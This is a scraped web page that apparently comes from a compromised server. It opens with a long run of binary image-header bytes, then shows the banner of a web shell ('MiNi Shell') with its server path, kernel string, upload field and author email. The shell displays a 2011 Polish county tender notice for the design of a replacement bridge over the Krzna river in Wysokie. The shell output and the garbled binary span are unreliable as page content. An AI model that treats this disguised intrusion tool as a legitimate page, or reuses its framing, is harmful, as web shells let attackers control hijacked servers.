JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110509/104872-N-2011.html

<p class="kh_header"><b>Biała Podlaska: Opracowanie kompletnej dokumentacji projektowej w stadium projektu budowlano-wykonawczego na przebudowę mostu przez rzekę Krznę w m. Wysokie, w km 22+232 drogi powiatowej Nr 1114L Sławacinek Nowy - Porosiuki - Sokule - Sitno - Wysokie (droga klasy Z) wraz z dojazdami długości około 0,300 km</b><br>
<b>Numer ogłoszenia: 104872 - 2011; data zamieszczenia: 09.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Białej Podlaskiej , ul. Sidorska 90A, 21-500 Biała Podlaska, woj. lubelskie, tel. 083 3431909, faks 083 3437975.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> powiatbialski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompletnej dokumentacji projektowej w stadium projektu budowlano-wykonawczego na przebudowę mostu przez rzekę Krznę w m. Wysokie, w km 22+232 drogi powiatowej Nr 1114L Sławacinek Nowy - Porosiuki - Sokule - Sitno - Wysokie (droga klasy Z) wraz z dojazdami długości około 0,300 km.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem  zamówienia  jest  opracowanie kompletnej dokumentacji projektowej w stadium projektu budowlano-wykonawczego na przebudowę mostu przez rzekę Krznę w m. Wysokie, w km 22+232 drogi powiatowej Nr 1114L Sławacinek Nowy - Porosiuki - Sokule - Sitno - Wysokie (droga klasy Z) wraz z dojazdami długości około 0,300 km.
2.Zakres projektowanych robót obejmuje m.in.: 
2.1.rozbiórkę istniejącego mostu przez rzekę Krznę,
2.2.budowę mostu przez rzekę Krznę,
2.3.poszerzenie i wzmocnienie istniejącej nawierzchni na dojazdach do mostu,
2.4.przebudowa istniejącego systemu powierzchniowego odwodnienia korpusu drogowego,
2.5.plan wyrębu drzew kolidujących z projektem.
3.Zakres opracowania:
3.1.Proces projektowania przeprowadzić w 2 etapach:
3.1.1.I etap - opracowanie min. 3 koncepcji (w terminie do dwóch miesięcy od daty podpisania umowy) w oparciu o następujące sugestie:
- środowiskowe (usunięcie dwóch podpór z koryta rzeki, co poprawi warunki przepływu wody, zapobieganie gromadzeniu się zanieczyszczeń na filarach mostu 
i konieczność ponoszenia kosztów ich usuwania oraz rozmywania brzegów rzeki),
- czasu budowy (m.in. odniesienie do opracowania IBDiM ,,Mosty w 3 miesiące,,),
- najmniej uciążliwego dla okolicznych mieszkańców,
- korzystnej pod względem kosztów realizacji i późniejszego utrzymania.
3.1.2.II etap - na podstawie wielokryterialnej analizy porównawczej Zamawiający wybierze wariant do wykonania projektu budowlano - wykonawczego.
3.2.projekt rozbiórki i utylizacji mostu istniejącego - 3 egz.,
3.3.geotechniczne rozpoznanie podłoża dla mostu i drogi - 3 egz.,
3.4.opracowanie raportu o oddziaływaniu planowanego przedsięwzięcia na środowisko (jeżeli będzie wymagany) - 2 egz., oraz wniosku  i materiałów do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach  zgody na realizację przedsięwzięcia, jak też  uzyskanie decyzji (na podstawie  upoważnienia Inwestora) zgodnie z ustawą z dnia 
3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz oceny oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 z późn. zm.),
3.5.sporządzenie operatu wodno-prawnego oraz uzyskanie decyzji o pozwoleniu  wodno-prawnym (na podstawie upoważnienia Inwestora) jeżeli będzie wymagane w 3 egz.,
3.6.projekt budowlany mostu  - 7egz.,
3.7.projekt wykonawczy mostu  - 7 egz.,
3.8.niezbędne  projekty branżowe dotyczących przebudowy ewentualnych kolizji  istniejącego lub projektowanego uzbrojenia terenu - po 5 egz.,
3.9.plan wyrębu drzew - 3 egz.,
3.10.informacje dotyczące bezpieczeństwa i ochrony zdrowia (BIOZ) - 5 egz.,
3.11.szczegółowa specyfikacja techniczna wykonania i odbioru robót - 3 egz.,
3.12.zatwierdzony projekt stałej organizacji ruchu - 3 egz.,
3.13.przedmiar robót (oddzielne dla każdej branży)  - po 2 egz.,
3.14.kosztorysy inwestorskie (oddzielne dla każdej branży)  - po 2 egz.,
3.15.wersja elektroniczna (nośnik CD-R) całego opracowania - format zapisu - PDF - 1 egz. i  Microsoft Word - 1 egz.,
4.Dane i warunki wyjściowe do projektowania:
4.1.Stan istniejący:
Most stały trzyprzęsłowy prefabrykowany, żelbetowy, swobodnie podparty, bez wsporników. Konstrukcja ustroju niosącego z belek żelbetowych prefabrykowanych typu ,,Gromnik,, o długości L=36 m i wysokości konstrukcyjnej H=0,56 m (19 szt. belek w przekroju poprzecznym) i rozpiętości teoretycznej 3x11,5 m. Przyczółki żelbetowe ściankowe posadowione poprzez żelbetową ławę fundamentową o przekroju 2,00x0,80 m i długości 9,88 m, na dwóch rzędach prefabrykowanych żelbetowych pali wbijanych o przekroju 30x30 cm i długości 7,00 m, w ilości 13 szt. pod każdym z przyczółków. Przyczółki zakończone są żelbetowymi skrzydłami podwieszonymi o długości 2,00 m. filary (2 szt.) żelbetowe o korpusach ściankowych pełnych (gr. ścianki 50 cm), posadowione poprzez ławy fundamentowe o przekroju 30x30 cm i długości 7,00 m w ilości 14 szt. pod każdym z filarów. Izolacja mostu z dwóch warstw papy jutowej na lepiku, zabezpieczona betonem ochronnym gr. 4 cm. Nawierzchnia jezdni bitumiczna o gr. 5 cm. Nawierzchnia chodników z asfaltu lanego ułożonego na żelbetowych prefabrykatach chodników. Istniejący most jest w złym stanie technicznym.
Parametry techniczno - eksploatacyjne istniejącego mostu:
1)długość całkowita obiektu Lc=36,06 m,
2)rozpiętość teoretyczna lt=3x11,50 m,
3)ilość przęseł n=3,
4)szerokość całkowita bc=9,92 m,
5)jezdnia dwukierunkowa dla dwóch pasów ruchu o szerokości bj=7,00 m,
6)obustronne chodniki dla pieszych - szerokości 1,25 m,
7)obiekt został wybudowany w 1975 r.
W trakcie wykonywania projektu istniejącego mostu (1974 r.) wykonano odwierty określające układy geotechniczne:
- pomiędzy rzędnymi 98,30 m ÷ 95,30 m - grunty nie nośne - namuł i torfy,
- pomiędzy rzędnymi 95,30 m ÷ 94,70 m - piasek drobnoziarnisty średnio zagęszczony,
- poniżej rzędnej 94,70 m - piaski gruboziarniste średnio zagęszczone.
Odległość wody wielkiej spiętrzonej od spodu istniejącej konstrukcji - 0,71 m.
Zamawiający udostępni do wglądu dokumentacje projektową oraz przeglądu szczegółowego istniejącego mostu.
4.2. Należy zaprojektować:  
-  most - nośność - klasa minimum B - 40 Mg,                                       
- dojazdy - wzmocnienie i poszerzenie istniejącej nawierzchni drogi poza pomostem do szerokości jezdni na pomoście.
- szerokość jezdni na pomoście: 2 pasy po 3,0 m środkiem jezdni + 2 pasy ochronne po 1,0 m.
- dwa normatywne ciągi piesze (chodniki) po obu stronach jezdni.
4.3.Lokalizacja mostu - bez zmian w stosunku do stanu istniejącego,
4.4.Na czas przebudowy zapewniony musi być nieprzerwany ruch pieszych (kładka), co należy uwzględnić w kosztorysie inwestorskim jako koszty ponoszone przez Wykonawcę robót. Ruch kołowy będzie odbywał się proponowaną drogą objazdową gruntową (ok. 1,3 km) co pokazano na planie orientacyjnym. 
4.5.Wszelkie niezbędne materiały, pomiary i badania do opracowania  projektu, a później do uzyskania pozwolenia na budowę,  w tym decyzji o lokalizacji celu publicznego  i decyzji środowiskowej  oraz pozwolenia wodno-prawnego  Wykonawca pozyska we własnym zakresie.
4.6.Wykonawca jest zobowiązany uzyskać wszelkie wymagane decyzje, pozwolenia, uzgodnienia i opinie zezwalające na realizację  projektowanej inwestycji. Wszelkie opłaty i koszty związane z ich uzyskaniem ponosi Wykonawca. Inwestorem realizacji zadania inwestycyjnego będzie Powiat Bialski, zatem wszelkie pozwolenia i inne elementy formalno - prawne należy uzyskiwać w imieniu Inwestora (na podstawie upoważnienia Inwestora).
4.7.Wykonawca zobowiązuje się do wykonania dokumentacji projektowej, stanowiącej przedmiot umowy zgodnie ze zleceniem Zamawiającego, zasadami współczesnej wiedzy technicznej, obowiązującymi w tym zakresie przepisami oraz zgodnie z normami.
4.8.Na stronach tytułowych  i w tabelkach  dokumentacji opisać: Inwestor: Powiat Bialski.
4.9.Wszystkie kopie muszą zawierać poświadczenie za zgodność z oryginałem  i być podpisane  przez  projektanta  z  pieczątką na  każdej stronie.  Strony muszą być ponumerowane łącznie z załącznikami.
4.10.Projekty budowlane powinny być oprawione w sposób uniemożliwiający
zdekompletowanie.
4.11.Dokumentacja powinna być sporządzona w oparciu o Rozporządzenie Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004r., Nr 202, poz.2072 ze zm.) oraz ,,Studia i skład dokumentacji projektowej dla dróg i mostów w fazie przygotowania zadań,, (Zarządzenie Generalnego Dyrektora Dróg Publicznych Nr 17 z dn. 11 maja 2009 r.).
4.12.Przyjęte rozwiązania projektowe winny odpowiadać warunkom określonym w Rozporządzeniu Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 roku w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. z 1999r., Nr 43 poz.430 ze zm.) oraz w oparciu o Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 30 maja 2000 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie (Dz. U. z 2000r., Nr 63, poz. 735 ze zm.).
4.13.Zamawiający posiada aktualne podkłady geodezyjne sytuacyjno - wysokościowe w skali 1:1000 (mapa do celów projektowych).
4.14.Zamawiający zastrzega sobie prawo do uzyskiwania od Wykonawcy informacji o postępie prac i przyjętych rozwiązaniach w trakcie projektowania, jak również prawa do zgłaszania swoich uwag, które Wykonawca uwzględni w dalszych pracach nad projektem (rada techniczna w siedzibie Zamawiającego 1 raz w miesiącu).
4.15.Wykonawca zobowiązuje się do nieodpłatnego i niezwłocznego udzielania wyjaśnień na ewentualne zapytania oferentów, jakie złożone zostaną w toku przetargu na wykonawstwo robót realizowanych na podstawie wykonanej przez niego dokumentacji projektowo-kosztorysowej, a także zajmowania stanowiska w przypadku złożenia odwołania.
4.16.Wykonawca przejmie na siebie wyłączną odpowiedzialność za wszelkie roszczenia z tytułu praw autorskich związanych z wykonywaną dokumentacją projektową. Zobowiązuje się on ponadto do pokrycia wszelkich kosztów wynikających z popełnionych błędów.
4.17.Zaleca się oferentom, aby dokonali wizji lokalnej i uzyskali wszelkie informacje dla kompleksowego sporządzenia oferty.
5.Uwagi:
a)dokumentacja powinna mieć format A-4.
b)przedmiary robót oraz kosztorysy inwestorskie powinny być tak opracowane, aby przyjęte opisy  robót, jednostki miary i ilości robót były zgodne w treści w każdym dokumencie.
c)części tekstowe: przedmiary robót, kosztorysy inwestorskie i opisy techniczne pisane czcionką  o wielkości 12.
d)zaleca się sporządzenie  kosztorysów inwestorskich wg KNNR i KNR w programie Norma Pro. Kosztorys inwestorski powinien być opracowany metodą kalkulacji uproszczonej - zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczeń planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z dnia 8 czerwca 2004 r. Nr 130, poz. 1389),
e)informacji dodatkowych udzieli Sekcja Mostowa p. Krzysztof Jaroszuk (tel. 83 343-19-09, 83 343-75-90, fax. 83 343-79-75, e-mail: zdp@poczta.fm) oraz Sekcja Budowy Nadzoru i Zamówień Publicznych ZDP w Białej Podlaskiej.
6.Szczegółowy zakres praw i obowiązków związanych z realizacją zamówienia określa wzór umowy załącznik Nr 6 do SIWZ.
7.Należność za roboty, będzie realizowana przez zamawiającego w formie przelewu, nie później niż 15 dni od daty otrzymania faktury VAT..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu zgodne treścią Załącznika Nr 3 do SIWZ. Ocena spełnienia warunków wymaganych od wykonawców prowadzona będzie na podstawie analizy w/w dokumentów stosując formułę spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu zgodne treścią Załącznika Nr 3 do SIWZ oraz wykazać,że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej dwa projekty techniczne obejmujące branżę mostową (most o rozpiętości nie mniejszej niż 20 m) i wartości brutto nie mniejszej niż 100.000,00 zł (słownie: sto tysięcy złotych). Ocena spełnienia warunków wymaganych od wykonawców prowadzona będzie na podstawie analizy w/w dokumentów stosując formułę spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu zgodne treścią Załącznika Nr 3 do SIWZ. Ocena spełnienia warunków wymaganych od wykonawców prowadzona będzie na podstawie analizy w/w dokumentów stosując formułę spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu zgodne treścią Załącznika Nr 3 do SIWZ oraz przedstawi, że dysponuje co najmniej 2 osobami (projektant, sprawdzający) posiadającymi uprawnienia projektowe dla specjalności mostowej bez ograniczeń. Ocena spełnienia warunków wymaganych od wykonawców prowadzona będzie na podstawie analizy w/w dokumentów stosując formułę spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu zgodne treścią Załącznika Nr 3 do SIWZ. Ocena spełnienia warunków wymaganych od wykonawców prowadzona będzie na podstawie analizy w/w dokumentów stosując formułę spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatbialski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Białej Podlaskiej, ul. Sidorska 90A lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2011 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Białej Podlaskiej, ul. Sidorska 90A, pok. nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com